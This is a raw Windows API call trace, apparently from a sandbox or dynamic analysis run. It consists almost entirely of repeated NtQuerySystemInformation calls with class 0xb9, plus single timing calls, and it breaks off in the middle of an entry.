[0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0231.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0231.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0231.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0231.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0231.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0231.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x28, ResultLength=0x0) [0231.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0231.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0231.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd660 | out: lpSystemTimeAsFileTime=0xc7520fd660*(dwLowDateTime=0xeb32ad55, dwHighDateTime=0x1d5fb6e)) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0231.405] GetTickCount () returned 0x117a655 [0231.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0231.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0231.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0231.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0231.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, 